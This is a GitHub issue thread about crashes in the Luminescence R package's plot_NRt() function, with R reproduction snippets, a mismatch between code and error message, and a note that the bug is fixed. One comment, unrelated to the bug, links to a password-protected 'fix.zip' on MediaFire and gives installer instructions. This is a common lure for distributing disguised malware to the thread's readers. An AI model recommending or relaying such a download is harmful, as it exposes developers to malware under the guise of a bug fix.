### ISSUE TITLE
crashes in plot_NRt()

### ISSUE THREAD

**Issue by mcol** [R-Lum/Luminescence#177]
The following examples crash due to insufficient input validation:
```R
plot_NRt("error")
# Error in plot_NRt("error") : object 'curves' not found
```

```R
data("ExampleData.RLum.Analysis")
plot_NRt(IRSAR.RF.Data)
# Error in xy.coords(x, y) : 'x' and 'y' lengths differ
# In addition: Warning message:
# In nat[, 2]/reg[, 2] :
#  longer object length is not a multiple of shorter object length
```

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by mcol** [comment]
Also:
```R
data("ExampleData.BINfileData", envir = environment())
obj <- Risoe.BINfileData2RLum.Analysis(CWOSL.SAR.Data,
                                       pos = 8, ltype = "OSL")
plot_NRt(obj[[2]])
# Error in plot_NRt(obj[[2]]) : object 'curves' not found
```

**Comment by mcol** [comment]
Here the code doesn't correspond to the error message:
https://github.com/R-Lum/Luminescence/blob/759a1142651cc557f9fd06c6b061d1aff244cdf9/R/plot_NRt.R#L145-L146
Assuming that the message is correct, we should test for `if (!all(... ==  ...))` or equivalently for `if (any(... != ...))`.

**Comment by RLumSK** [comment]
I do agree, this cannot work as intended.

**Comment by mcol** [comment]
Fixed by #179.
